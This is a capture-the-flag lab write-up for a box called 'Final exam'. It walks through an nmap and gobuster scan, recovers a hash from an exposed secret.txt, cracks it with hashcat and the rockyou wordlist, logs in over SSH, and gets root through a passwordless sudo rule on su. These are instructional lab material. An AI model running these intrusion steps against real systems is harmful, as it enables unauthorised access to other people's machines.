Final exam
Eumeration
nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCfc3f0BTiHCcXfM5HblbdICzdy1guzmd9N9m12TmOIFFFHdeHQbWjCnA38bbRtlJbvKUXcvQBqtV7UCeHLbcLGq27LeoxnNW6XeVlmXLqwu/hqJqVyi9PDp1U21NwtJz/MaF0nXhirp1MKcj94QZjRHMuvrywpw0jlJAD34OUufv6HT5a5eakO/QrSNTLgACV0AIn3Pb5/iC6bSOctj7+e5ndq5IcHuHaVtpjVV9gCF62xxTCN6hdQKF8KjWfWUEkEDRhgjKyENsLO1/XUNH0iTHsvOH8N3JN9z43067NBlX3sddciBl2HNwxlQEe8O8UC63yHvmx4M7agoyDYPwTF
| 256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH3QGzm8W9HuRYyoZkwHKkcVgJDlqnCU0s6Rt5fPp/Z34BYj4845B5la/2abdCyJ4zPUuOyS2OMAyJAFUm31kG0=
| 256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILs98AjzXfqGGqDneopePHJoBvde46uWWPJ4r7xfVv5p
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Gobuster
/.hta (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/index.html (Status: 200) [Size: 11321]
/secret (Status: 301) [Size: 311] [--> http://10.10.49.52/secret/]
/server-status (Status: 403) [Size: 276]
/secret.txt (Status: 200) [Size: 46]
Go get tha secret.txt file
nyan:046385855FC9580393853D8E81F240B66FE9A7B8
Old hash-id (haiti is better)
$hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: 046385855FC9580393853D8E81F240B66FE9A7B8
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
hashcat -m 100 '046385855FC9580393853D8E81F240B66FE9A7B8' /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
046385855fc9580393853d8e81f240b66fe9a7b8:nyan
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 046385855fc9580393853d8e81f240b66fe9a7b8
Time.Started.....: Sun Nov 7 01:33:01 2021 (4 secs)
Time.Estimated...: Sun Nov 7 01:33:05 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2195.6 kH/s (0.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4972544/14344385 (34.67%)
Rejected.........: 0/4972544 (0.00%)
Restore.Point....: 4970496/14344385 (34.65%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: nyasia. -> nwcfleshwound
Started: Sun Nov 7 01:32:31 2021
Stopped: Sun Nov 7 01:33:06 2021
So the credentials are nyan:nyan
boy..that meme feels so old now
$ssh [email protected]
The authenticity of host '10.10.57.168 (10.10.57.168)' can't be established.
ECDSA key fingerprint is SHA256:haqegvkQqmIEEzS0Mcd+NUsONboBQ6z3wQSwq+aj5Es.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.57.168' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)
- Documentation: https://help.ubuntu.com
- Management: https://landscape.canonical.com
- Support: https://ubuntu.com/advantage
Last login: Sat Dec 21 08:37:54 2019
nyan@ubuntu:~$
nyan@ubuntu:~$ cat user.txt
supernootnoot
God that guy is a meme machine
Privilege escalation
sudo -l
Matching Defaults entries for nyan on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nyan may run the following commands on ubuntu:
(root) NOPASSWD: /bin/su
LMAO
nyan@ubuntu:~$ sudo su
root@ubuntu:/home/nyan#
Fastest privileges ever
root@ubuntu:~# cat root.txt
congratulations!!!!
Hands down straightfoward!
7b304f3 @ 2024-11-15